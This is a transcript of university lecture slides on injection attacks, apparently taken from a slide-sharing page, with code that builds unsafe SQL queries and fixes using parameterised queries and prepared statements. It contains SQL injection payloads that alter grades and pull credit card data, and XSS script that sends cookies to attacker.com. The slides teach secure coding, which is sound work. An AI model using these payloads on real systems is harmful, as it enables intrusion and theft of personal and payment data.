Presentation is loading. Please wait.

Presentation is loading. Please wait.

CS 142 Lecture Notes: Injection AttacksSlide 1 xkcd.

Published byAnnis Dixon Modified over 9 years ago

Similar presentations

Presentation on theme: "CS 142 Lecture Notes: Injection AttacksSlide 1 xkcd."— Presentation transcript:

1 CS 142 Lecture Notes: Injection AttacksSlide 1 xkcd

2 CS 142 Lecture Notes: Injection AttacksSlide 2 Unsafe Server Code advisorName = params[:form][:advisor] students = Student.find_by_sql( "SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = '" + advisorName + "'"); SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones' Typical query: Value from form field

3 CS 142 Lecture Notes: Injection AttacksSlide 3 Injection Attack Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith' Resulting query: Enter the following in the "Advisor name" field:

4 CS 142 Lecture Notes: Injection AttacksSlide 4 Stealing Private Information

5 CS 142 Lecture Notes: Injection AttacksSlide 5 Stealing Private Info, cont'd month = params[:form][:month] orders = Orders.find_by_sql( "SELECT pizza, toppings, quantity, date " + "FROM orders " + "WHERE user_id=" + user_id + "AND order_month=" + month); October AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards ' What if "month" is: Server query code:

6 CS 142 Lecture Notes: Injection AttacksSlide 6 Resulting Query SELECT pizza, toppings, quantity, date FROM orders WHERE user_id=94412 AND order_month=October AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards

7 CS 142 Lecture Notes: Injection AttacksSlide 7 Resulting Query SELECT pizza, toppings, quantity, date FROM orders WHERE user_id=94412 AND order_month=October AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards

8 CS 142 Lecture Notes: Injection AttacksSlide 8 8 "The defendants would use so-called SQL injections, which send a command or piece of code to a computer allowing unauthorized users to manipulate contents of the computer system. Once they gained access to credit card numbers, some of the men would sell them to resellers."

9 CS 142 Lecture Notes: Injection AttacksSlide 9 Let Rails Handle SQL Escaping Student.find_by_sql("SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = ?", params[:form][:advisor])

10 CS 142 Lecture Notes: Injection AttacksSlide 10 Prepared Statements $statement = odbc_prepare($connection, "SELECT * FROM students ". "WHERE advisor = ? AND gpa >= ?;"); odbc_execute($statement, array($advisor, $gpa)); statement = connection.prepareStatement( "SELECT * FROM students " + "WHERE advisor = ? AND gpa >= ?;"); statement.setString(1, advisor); statement.setString(2, gpa); ResultSet rs = statement.executeQuery(); Java: PHP:

11 CS 142 Lecture Notes: Injection AttacksSlide 11 Stored XSS Attack...... I agree completely with Alice... img = document.getElementById("cookieMonster"); img.src = "http://attacker.com?cookie=" + encodeURIComponent(document.cookie); No escaping! Attacking blog entry: Buggy server template:

12 CS 142 Lecture Notes: Injection AttacksSlide 12 Reflected XSS Attack... Search Results Results for... No escaping! Buggy server template: Justin Bieber img = document.getElementById("cookieMonster"); img.src = "http://attacker.com?cookie=" + encodeURIComponent(document.cookie); Attacking search entry:

13 CS 142 Lecture Notes: CookiesSlide 13

Download ppt "CS 142 Lecture Notes: Injection AttacksSlide 1 xkcd."

Similar presentations

CS 142 Lecture Notes: Injection AttacksSlide 1 Unsafe Server Code advisorName = params[:form][:advisor] students = Student.find_by_sql( SELECT students.*

CS 142 Lecture Notes: Injection AttacksSlide 1 Unsafe Server Code advisorName = params[:form][:advisor] students = Student.find_by_sql( "SELECT students.*
How Did I Steal Your Database Mostafa

How Did I Steal Your Database Mostafa
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
SQL Hacking. 2222 I NTRODUCTION Data theft is becoming a major threat. Criminals have identified where the gold is. In the last year many databases from.

SQL Hacking I NTRODUCTION Data theft is becoming a major threat. Criminals have identified where the gold is. In the last year many databases from.
1. What is SQL Injection 2. Different varieties of SQL Injection 3. How to prevent it.

1. What is SQL Injection 2. Different varieties of SQL Injection 3. How to prevent it.
Project 7 Discussion Section XSS and SQL Injection in Rails.

Project 7 Discussion Section XSS and SQL Injection in Rails.
Misc. Announcements Backup your work! Document team members’ contributions (so that if there is any dispute …) More Bonus credits: Create screencasts for.

Misc. Announcements Backup your work! Document team members’ contributions (so that if there is any dispute …) More Bonus credits: Create screencasts for.
Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.

Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.
LCT2506 Internet 2 Data-driven web sites Week 5. LCT2506 Internet 2 Current Practice  Combining web pages and data stored in a relational database is.

LCT2506 Internet 2 Data-driven web sites Week 5. LCT2506 Internet 2 Current Practice  Combining web pages and data stored in a relational database is.
1 Foundations of Software Design Lecture 27: Java Database Programming Marti Hearst Fall 2002.

1 Foundations of Software Design Lecture 27: Java Database Programming Marti Hearst Fall 2002.
Information Storage and Retrieval CS French Chapter 3.

Information Storage and Retrieval CS French Chapter 3.
Computer Science 101 Web Access to Databases Overview of Web Access to Databases.

Computer Science 101 Web Access to Databases Overview of Web Access to Databases.
Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.

Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.
SQL Injection Attacks CS 183 : Hypermedia and the Web UC Santa Cruz.

SQL Injection Attacks CS 183 : Hypermedia and the Web UC Santa Cruz.
1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.

1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
1 CS428 Web Engineering Lecture 23 MySQL Basics (PHP - VI)

1 CS428 Web Engineering Lecture 23 MySQL Basics (PHP - VI)
Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.

Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.
Secure Software Engineering: Input Vulnerabilities

Secure Software Engineering: Input Vulnerabilities
4-1 INTERNET DATABASE CONNECTOR Colorado Technical University IT420 Tim Peterson.

4-1 INTERNET DATABASE CONNECTOR Colorado Technical University IT420 Tim Peterson.

Similar presentations

Ads by Google